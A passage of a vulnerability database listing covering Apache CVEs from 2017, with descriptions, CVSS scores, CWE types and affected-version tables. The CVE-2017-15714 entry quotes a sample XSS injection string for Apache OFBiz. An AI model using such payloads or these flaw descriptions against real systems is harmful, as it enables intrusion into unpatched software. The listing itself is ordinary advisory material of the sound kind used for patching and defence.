apache tomcat 8.5.18
apache tomcat 7.0.3
apache tomcat 7.0.40
oracle micros_retail_xbri_loss_prevention 10.7.0
oracle retail_returns_management 14.1.3
apache tomcat 7.0.72
apache tomcat 9.0.0
redhat enterprise_linux_for_power_big_endian 6.0_ppc64
oracle retail_price_management 13.1
redhat enterprise_linux_workstation 6.0
oracle retail_price_management 16.0
oracle retail_xstore_point_of_service 15.0.1
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.0.40
oracle retail_order_management_system 5.0
apache tomcat 7.0.77
apache tomcat 7.0.36
apache tomcat 7.0.57
redhat enterprise_linux_server_tus 7.6
apache tomcat 7.0.38
oracle retail_insights 14.1
oracle retail_order_management_system 4.5
apache tomcat 7.0.9
apache tomcat 7.0.18
oracle retail_store_inventory_management 13.0.7
apache tomcat 7.0.7
oracle transportation_management 6.3.6
apache tomcat 7.0.34
oracle retail_invoice_matching 13.2
oracle micros_retail_xbri_loss_prevention 10.5.0
redhat enterprise_linux_server_aus 7.6
oracle retail_order_broker 15.0
redhat enterprise_linux_for_ibm_z_systems_eus 7.4_s390x
oracle enterprise_manager_for_mysql_database 12.1.0.4.0
apache tomcat 7.0.45
apache tomcat 8.0.10
canonical ubuntu_linux 17.10
apache tomcat 7.0.27
oracle transportation_management 6.3.7
redhat enterprise_linux_for_power_big_endian_eus 7.4_ppc64
oracle retail_convenience_and_fuel_pos_software 2.1.132
redhat enterprise_linux_for_ibm_z_systems 6.0_s390x
apache tomcat 8.5.20
apache tomcat 7.0.69
apache tomcat 8.0.13
apache tomcat 8.5.16
apache tomcat 8.0.31
oracle communications_instant_messaging_server 10.0.1
oracle instantis_enterprisetrack 17.2
apache tomcat 8.0.27
apache tomcat 8.5.1
redhat enterprise_linux_eus_compute_node 7.5
oracle health_sciences_empirica_inspections 1.0.1.1
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 7.0.56
apache tomcat 8.5.15
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
oracle transportation_management 6.3.1
redhat enterprise_linux_server_tus 7.4
oracle transportation_management 6.3.4
apache tomcat 7.0.50
oracle micros_retail_xbri_loss_prevention 10.8.1
apache tomcat 7.0.60
apache tomcat 7.0.28
redhat enterprise_linux_for_power_big_endian_eus 7.6_ppc64
redhat enterprise_linux_for_power_little_endian_eus 7.7_ppc64le
oracle retail_order_broker 5.0
apache tomcat 8.5.6
apache tomcat 7.0.21
oracle retail_eftlink 1.1.124
apache tomcat 8.0.23
oracle micros_retail_xbri_loss_prevention 10.6.0
apache tomcat 8.5.8
oracle retail_advanced_inventory_planning 13.2
oracle endeca_information_discovery_integrator 3.2.0
apache tomcat 7.0.65
redhat enterprise_linux_eus_compute_node 7.4
redhat enterprise_linux_server_tus 7.7
apache tomcat 7.0.11
apache tomcat 7.0.16
redhat jboss_enterprise_web_server 2.0.0
oracle retail_price_management 14.1
oracle retail_invoice_matching 12.0
apache tomcat 8.5.0
apache tomcat 7.0.70
oracle retail_invoice_matching 13.0
oracle retail_insights 14.0
apache tomcat 8.0.34
apache tomcat 8.0.43
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 7.0.35
oracle retail_insights 15.0
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
redhat enterprise_linux_eus 7.4
apache tomcat 7.0.46
oracle agile_plm 9.3.5
oracle mysql_enterprise_monitor *
apache tomcat 8.0.9
redhat enterprise_linux_for_power_little_endian_eus 7.6_ppc64le
oracle retail_invoice_matching 13.1
apache tomcat 8.0.41
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.7
apache tomcat 8.5.10
apache tomcat 7.0.49
oracle agile_plm 9.3.4
oracle retail_returns_management 2.3.8
apache tomcat 8.5.12
apache tomcat 8.0.1
oracle endeca_information_discovery_integrator 3.1.0
netapp oncommand_shift -
apache tomcat 7.0.10
apache tomcat 7.0.66
oracle retail_central_office 14.1.3
apache tomcat 8.5.13
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 7.0.2
oracle transportation_management 6.3.2
apache tomcat 8.0.28
apache tomcat 7.0.63
redhat enterprise_linux_for_ibm_z_systems 7.0_s390x
apache tomcat 8.0.2
oracle retail_invoice_matching 15.0
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-12618 LOW

Apache Portable Runtime Utility (APR-util) 1.6.0 and prior fail to validate the integrity of SDBM database files used by apr_sdbm*() functions, resulting in a possible out of bound read access. A local user with write access to the database can make a program or process using these functions crash, and cause a denial of service.

CVSS 2.0

Severity: LOW

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache portable_runtime_utility 0.9.2
apache portable_runtime_utility 1.2.1
apache portable_runtime_utility 1.4.3
apache portable_runtime_utility 1.1.0
apache portable_runtime_utility 1.2.8
apache portable_runtime_utility 0.9.6
apache portable_runtime_utility 1.3.7
apache portable_runtime_utility 1.3.1
apache portable_runtime_utility 1.5.5
apache portable_runtime_utility 1.4.0
apache portable_runtime_utility 0.9.18
apache portable_runtime_utility 1.2.7
apache portable_runtime_utility 0.9.14
apache portable_runtime_utility 1.3.3
apache portable_runtime_utility 0.9.20
apache portable_runtime_utility 1.3.5
apache portable_runtime_utility 1.1.2
apache portable_runtime_utility 0.9.9
apache portable_runtime_utility 1.0.2
apache portable_runtime_utility 1.0.1
apache portable_runtime_utility 1.0.0
apache portable_runtime_utility 1.3.8
apache portable_runtime_utility 0.9.19
apache portable_runtime_utility 1.2.13
apache portable_runtime_utility 1.5.4
apache portable_runtime_utility 0.9.13
apache portable_runtime_utility 1.2.12
apache portable_runtime_utility 0.9.1
apache portable_runtime_utility 1.2.9
apache portable_runtime_utility 0.9.5
apache portable_runtime_utility 1.3.0
apache portable_runtime_utility 1.3.9
apache portable_runtime_utility 0.9.16
apache portable_runtime_utility 0.9.3
apache portable_runtime_utility 1.3.10
apache portable_runtime_utility 0.9.12
apache portable_runtime_utility 0.9.17
apache portable_runtime_utility 1.3.6
apache portable_runtime_utility 1.4.2
apache portable_runtime_utility 1.2.6
apache portable_runtime_utility 1.3.13
apache portable_runtime_utility 1.5.2
apache portable_runtime_utility 1.3.2
apache portable_runtime_utility 0.9.4
apache portable_runtime_utility 1.1.1
apache portable_runtime_utility 1.2.10
apache portable_runtime_utility 1.5.1
apache portable_runtime_utility 1.4.1
apache portable_runtime_utility 0.9.11
apache portable_runtime_utility 0.9.15
apache portable_runtime_utility 1.6.0
apache portable_runtime_utility 1.3.4
apache portable_runtime_utility 1.3.11
apache portable_runtime_utility 1.2.2
apache portable_runtime_utility 1.3.12
apache portable_runtime_utility 1.5.0
apache portable_runtime_utility 0.9.10
apache portable_runtime_utility 0.9.7
apache portable_runtime_utility 1.5.3
CVE-2017-12619 MEDIUM

Apache Zeppelin prior to 0.7.3 was vulnerable to session fixation which allowed an attacker to hijack a valid user session. Issue was reported by "stone lone".

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2017-12620 HIGH

When loading models or dictionaries that contain XML it is possible to perform an XXE attack. Since Apache OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources. The versions 1.5.0 to 1.5.3, 1.6.0, 1.7.0 to 1.7.2, 1.8.0 to 1.8.1 of Apache OpenNLP are affected.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache opennlp 1.8.0
apache opennlp 1.5.1
apache opennlp 1.7.0
apache opennlp 1.8.1
apache opennlp 1.5.0
apache opennlp 1.5.3
apache opennlp 1.7.1
apache opennlp 1.6.0
apache opennlp 1.5.2
apache opennlp 1.7.2
CVE-2017-12621 HIGH

During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks in Apache Commons Jelly before 1.0.1.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache commons_jelly *
CVE-2017-12622 MEDIUM

When an Apache Geode cluster before v1.3.0 is operating in secure mode and an authenticated user connects to a Geode cluster using the gfsh tool with HTTP, the user is able to obtain status information and control cluster members even without CLUSTER:MANAGE privileges.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-12623 MEDIUM

An authorized user could upload a template which contained malicious code and accessed sensitive files via an XML External Entity (XXE) attack. The fix to properly handle XML External Entities was applied on the Apache NiFi 1.4.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi 1.0.0
apache nifi 1.0.1
apache nifi 1.3.0
apache nifi 1.1.2
apache nifi 1.2.0
apache nifi 1.1.1
apache nifi 1.1.0
CVE-2017-12624 MEDIUM

Apache CXF supports sending and receiving attachments via either the JAX-WS or JAX-RS specifications. It is possible to craft a message attachment header that could lead to a Denial of Service (DoS) attack on a CXF web service provider. Both JAX-WS and JAX-RS services are vulnerable to this attack. From Apache CXF 3.2.1 and 3.1.14, message attachment headers that are greater than 300 characters will be rejected by default. This value is configurable via the property "attachment-max-header-size".

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cxf *
CVE-2017-12625 MEDIUM

Apache Hive 2.1.x before 2.1.2, 2.2.x before 2.2.1, and 2.3.x before 2.3.1 expose an interface through which masking policies can be defined on tables or views, e.g., using Apache Ranger. When a view is created over a given table, the policy enforcement does not happen correctly on the table for masked columns.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hive 2.3.0
apache hive 2.2.0
apache hive 2.1.1
apache hive 2.1.0
CVE-2017-12626 MEDIUM

Apache POI in versions prior to release 3.17 is vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
apache poi *
CVE-2017-12627 HIGH

In Apache Xerces-C XML Parser library before 3.2.1, processing of external DTD paths can result in a null pointer dereference under certain conditions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache xerces-c++ *
CVE-2017-12628 HIGH

The JMX server embedded in Apache James, also used by the command line client, is exposed to a Java de-serialization issue, and thus can be used to execute arbitrary commands. As James exposes the JMX socket by default only on localhost, this vulnerability can only be used for privilege escalation. Release 3.0.1 upgrades the incriminated library.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache james_server *
CVE-2017-12629 HIGH

Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
canonical ubuntu_linux 16.04
redhat jboss_enterprise_application_platform 7.0.0
debian debian_linux 9.0
debian debian_linux 7.0
redhat jboss_enterprise_application_platform 7.1.0
apache solr *
debian debian_linux 8.0
CVE-2017-12630 LOW

In Apache Drill 1.11.0 and earlier, when submitting a form from the Query page, users are able to pass arbitrary script or HTML which will take effect on the Profile page afterwards. Example: after submitting a special script that returns cookie information from the Query page, a malicious user may obtain this information from the Profile page afterwards.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache drill *
CVE-2017-12631 MEDIUM

Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross-Site Request Forgery) style vulnerability has been found in the Spring 2, Spring 3 and Spring 4 plugins in versions before 1.4.3 and 1.3.3. The vulnerability can result in a security context that is set up using a malicious client's roles for the given end user.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.4.0
apache cxf_fediz 1.4.1
apache cxf_fediz 1.4.2
CVE-2017-12632 MEDIUM

A malicious host header in an incoming HTTP request could cause NiFi to load resources from an external server. The fix to sanitize host headers and compare to a controlled whitelist was applied on the Apache NiFi 1.5.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache nifi *
CVE-2017-12633 HIGH

The camel-hessian component in Apache Camel 2.x before 2.19.4 and 2.20.x before 2.20.1 is vulnerable to a Java object de-serialisation vulnerability. De-serializing untrusted data can lead to security flaws.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel *
CVE-2017-12634 HIGH

The camel-castor component in Apache Camel 2.x before 2.19.4 and 2.20.x before 2.20.1 is vulnerable to a Java object de-serialisation vulnerability. De-serializing untrusted data can lead to security flaws.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache camel 2.20.0
apache camel *
CVE-2017-12635 HIGH

Due to differences between the Erlang-based JSON parser and the JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, which denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour such that, if two 'roles' keys are present in the JSON, the second one is used for authorising the document write, but the first 'roles' key is used for subsequent authorization of the newly created user. By design, users cannot assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-269,

Products Affected

Vendor Product Version
apache couchdb *
apache couchdb 2.0.0
CVE-2017-12636 HIGH

CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, including downloading and executing scripts from the public internet.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache couchdb *
apache couchdb 2.0.0
CVE-2017-15691 MEDIUM

In Apache uimaj prior to 2.10.2, Apache uimaj 3.0.0-xxx prior to 3.0.0-beta, Apache uima-as prior to 2.10.2, Apache uimaFIT prior to 2.4.0, Apache uimaDUCC prior to 2.2.2, this vulnerability relates to an XML external entity expansion (XXE) capability of various XML parsers. UIMA as part of its configuration and operation may read XML from various sources, which could be tainted in ways to cause inadvertent disclosure of local files or other internal content.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache uimaj 3.0.0
apache uimaducc *
apache uimafit *
apache uima-as *
apache uimaj *
CVE-2017-15692 HIGH

In Apache Geode before v1.4.0, the TcpServer within the Geode locator opens a network port that deserializes data. If an unprivileged user gains access to the Geode locator, they may be able to cause remote code execution if certain classes are present on the classpath.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15693 MEDIUM

In Apache Geode before v1.4.0, the Geode server stores application objects in serialized form. Certain cluster operations and API invocations cause these objects to be deserialized. A user with DATA:WRITE access to the cluster may be able to cause remote code execution if certain classes are present on the classpath.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15694 MEDIUM

When an Apache Geode server versions 1.0.0 to 1.8.0 is operating in secure mode, a user with write permissions for specific data regions can modify internal cluster metadata. A malicious user could modify this data in a way that affects the operation of the cluster.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-88,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15695 MEDIUM

When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15696 MEDIUM

When an Apache Geode cluster before v1.4.0 is operating in secure mode, the Geode configuration service does not properly authorize configuration requests. This allows an unprivileged user who gains access to the Geode locator to extract configuration data and previously deployed application code.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-15697 HIGH

A malicious X-ProxyContextPath or X-Forwarded-Context header containing external resources or embedded code could cause remote code execution. The fix to properly handle these headers was applied on the Apache NiFi 1.5.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache nifi *
CVE-2017-15698 MEDIUM

When parsing the AIA-Extension field of a client certificate, Apache Tomcat Native Connector 1.2.0 to 1.2.14 and 1.1.23 to 1.1.34 did not correctly handle fields longer than 127 bytes. The result of the parsing error was to skip the OCSP check. It was therefore possible for client certificates that should have been rejected (if the OCSP check had been made) to be accepted. Users not using OCSP checks are not affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache tomcat_native *
debian debian_linux 9.0
debian debian_linux 8.0
CVE-2017-15699 MEDIUM

A Denial of Service vulnerability was found in Apache Qpid Dispatch Router versions 0.7.0 and 0.8.0. To exploit this vulnerability, a remote user must be able to establish an AMQP connection to the Qpid Dispatch Router and send a specifically crafted AMQP frame which will cause it to segfault and shut down.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache qpid_dispatch 0.7.0
apache qpid_dispatch 0.8.0
CVE-2017-15700 MEDIUM

A flaw in the org.apache.sling.auth.core.AuthUtil#isRedirectValid method in Apache Sling Authentication Service 1.4.0 allows an attacker, through the Sling login form, to trick a victim to send over their credentials.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache sling_authentication_service 1.4.0
CVE-2017-15701 MEDIUM

In Apache Qpid Broker-J versions 6.1.0 through 6.1.4 (inclusive) the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2017-15702 HIGH

In Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2017-15703 LOW

Any authenticated user (valid client certificate but without ACL permissions) could upload a template which contained malicious code and caused a denial of service via Java deserialization attack. The fix to properly handle Java deserialization was applied on the Apache NiFi 1.4.0 release. Users running a prior 1.x release should upgrade to the appropriate release.

CVSS 2.0

Severity: LOW

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache nifi *
CVE-2017-15705 MEDIUM

A denial of service vulnerability was identified that exists in Apache SpamAssassin before 3.4.2. The vulnerability arises with certain unclosed tags in emails that cause markup to be handled incorrectly, leading to scan timeouts. In Apache SpamAssassin, using HTML::Parser, we set up an object and hook into the begin and end tag event handlers. In both cases, the "open" event is immediately followed by a "close" event - even if the tag *does not* close in the HTML being parsed. Because of this, we are missing the "text" event to deal with the object normally. This can cause carefully crafted emails to take more scan time than expected, leading to a Denial of Service. The issue is possibly a bug or design decision in HTML::Parser that specifically impacts the way Apache SpamAssassin uses the module with poorly formed HTML. The exploit has been seen in the wild but is not believed to have been purposefully part of a Denial of Service attempt. We are concerned that there may be attempts to abuse the vulnerability in the future.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache spamassassin *
canonical ubuntu_linux 16.04
canonical ubuntu_linux 18.04
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_workstation 7.0
debian debian_linux 8.0
redhat enterprise_linux_server 7.0
CVE-2017-15706 MEDIUM

As part of the fix for bug 61201, the documentation for Apache Tomcat 9.0.0.M22 to 9.0.1, 8.5.16 to 8.5.23, 8.0.45 to 8.0.47 and 7.0.79 to 7.0.82 included an updated description of the search algorithm used by the CGI Servlet to identify which script to execute. The update was not correct. As a result, some scripts may have failed to execute as expected and other scripts may have been executed unexpectedly. Note that the behaviour of the CGI servlet has remained unchanged in this regard. It is only the documentation of the behaviour that was wrong and has been corrected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-358,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
apache tomcat 9.0.1
CVE-2017-15707 MEDIUM

In Apache Struts 2.5 to 2.5.14, the REST Plugin uses an outdated JSON-lib library which is vulnerable and allows a DoS attack to be performed using a malicious request with a specially crafted JSON payload.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.5
netapp oncommand_balance -
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 7.1.6
oracle enterprise_manager_for_virtualization 13.2.3
oracle retail_xstore_point_of_service 7.0.6
oracle agile_plm_framework 9.3.6
oracle weblogic_server 12.2.1.2
oracle enterprise_manager_for_virtualization 13.2.2
oracle global_lifecycle_management_opatchauto *
oracle jd_edwards_enterpriseone_tools 9.2
oracle financial_services_hedge_management_and_ifrs_valuations 8.0.4
oracle webcenter_portal 12.2.1.2.0
oracle retail_xstore_point_of_service 16.0.2
oracle financial_services_market_risk_measurement_and_management 8.0.5
oracle retail_xstore_point_of_service 6.5.11
oracle retail_order_broker 5.2
oracle retail_xstore_point_of_service 15.0.1
oracle weblogic_server 12.2.1.3
CVE-2017-15708 HIGH

In Apache Synapse, by default no authentication is required for Java Remote Method Invocation (RMI). So Apache Synapse 3.0.1 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. And the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions in Synapse distribution makes this exploitable. To mitigate the issue, we need to limit RMI access to trusted users only. Further upgrading to 3.0.1 version will eliminate the risk of having said Commons Collection version. In Synapse 3.0.1, Commons Collection has been updated to 3.2.2 version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache synapse 1.1.2
apache synapse 1.1
apache synapse 1.1.1
apache synapse 2.0.0
oracle financial_services_market_risk_measurement_and_management 8.0.8
oracle peoplesoft_enterprise_peopletools 8.56
oracle financial_services_market_risk_measurement_and_management 8.0.6
apache synapse 2.1.0
apache synapse 1.2
apache synapse 3.0.0
apache synapse 1.0
oracle peoplesoft_enterprise_peopletools 8.57
CVE-2017-15709 MEDIUM

When using the OpenWire protocol in ActiveMQ versions 5.14.0 to 5.15.2 it was found that certain system details (such as the OS and kernel version) are exposed as plain text.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache activemq *
CVE-2017-15710 MEDIUM

In Apache httpd 2.0.23 to 2.0.65, 2.2.0 to 2.2.34, and 2.4.0 to 2.4.29, mod_authnz_ldap, if configured with AuthLDAPCharsetConfig, uses the Accept-Language header value to lookup the right charset encoding when verifying the user's credentials. If the header value is not present in the charset conversion table, a fallback mechanism is used to truncate it to a two characters value to allow a quick retry (for example, 'en-US' is truncated to 'en'). A header value of less than two characters forces an out of bound write of one NUL byte to a memory location that is not part of the string. In the worst case, quite unlikely, the process would crash which could be used as a Denial of Service attack. In the more likely case, this memory is already reserved for future use and the issue has no effect at all.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server 2.4.7
canonical ubuntu_linux 18.04
netapp storage_automation_store -
netapp santricity_cloud_connector -
apache http_server 2.4.28
apache http_server 2.4.2
netapp clustered_data_ontap -
apache http_server 2.4.18
redhat enterprise_linux 6.0
apache http_server 2.4.3
apache http_server 2.4.26
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apache http_server 2.4.1
redhat enterprise_linux 7.4
apache http_server 2.4.17
canonical ubuntu_linux 14.04
netapp storagegrid -
apache http_server 2.4.25
debian debian_linux 9.0
debian debian_linux 7.0
apache http_server 2.4.23
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
debian debian_linux 8.0
canonical ubuntu_linux 17.10
apache http_server 2.4.4
apache http_server 2.4.16
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 16.04
apache http_server 2.4.29
apache http_server 2.4.9
apache http_server 2.4.27
redhat enterprise_linux 7.6
CVE-2017-15712 MEDIUM

Vulnerability allows a user of Apache Oozie 3.1.3-incubating to 4.3.0 and 5.0.0-beta1 to expose private files on the Oozie server process. The malicious user can construct a workflow XML file containing XML directives and configuration that reference sensitive files on the Oozie server host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache oozie 4.2.0
apache oozie 3.2.0
apache oozie 3.1.3
apache oozie 4.0.0
apache oozie 3.1.2
apache oozie 4.1.0
apache oozie 3.3.1
apache oozie 3.2
apache oozie 3.3.2
apache oozie 4.0.1
apache oozie 4.3.0
apache oozie 5.0.0
apache oozie 3.3.0
CVE-2017-15713 MEDIUM

Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.0.4
apache hadoop 2.0.5
apache hadoop 2.1.0
apache hadoop 2.0.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 2.1.1
apache hadoop 2.0.2
apache hadoop 2.0.1
apache hadoop *
apache hadoop 3.0.0
CVE-2017-15714 HIGH

The BIRT plugin in Apache OFBiz 16.11.01 to 16.11.03 does not escape user input property passed. This allows for code injection by passing that code through the URL. For example by appending this code "__format=%27;alert(%27xss%27)" to the URL an alert window would execute.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache ofbiz 16.11.01
apache ofbiz 16.11.02
apache ofbiz 16.11.03
CVE-2017-15715 MEDIUM

In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 18.04
netapp storage_automation_store -
debian debian_linux 9.0
netapp santricity_cloud_connector -
netapp clustered_data_ontap -
debian debian_linux 8.0
canonical ubuntu_linux 17.10
redhat enterprise_linux 6.0
redhat enterprise_linux 7.0
redhat enterprise_linux 7.5
canonical ubuntu_linux 16.04
redhat enterprise_linux 7.4
canonical ubuntu_linux 14.04
redhat enterprise_linux 7.6
netapp storagegrid -
CVE-2017-15717 MEDIUM

A flaw in the way URLs are escaped and encoded in the org.apache.sling.xss.impl.XSSAPIImpl#getValidHref and org.apache.sling.xss.impl.XSSFilterImpl#isValidHref allows special crafted URLs to pass as valid, although they carry XSS payloads. The affected versions are Apache Sling XSS Protection API 1.0.4 to 1.0.18, Apache Sling XSS Protection API Compat 1.1.0 and Apache Sling XSS Protection API 2.0.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_xss_protection_api 2.0.0
apache sling_xss_protection_api_compat 1.1.0
apache sling_xss_protection_api *
CVE-2017-15718 MEDIUM

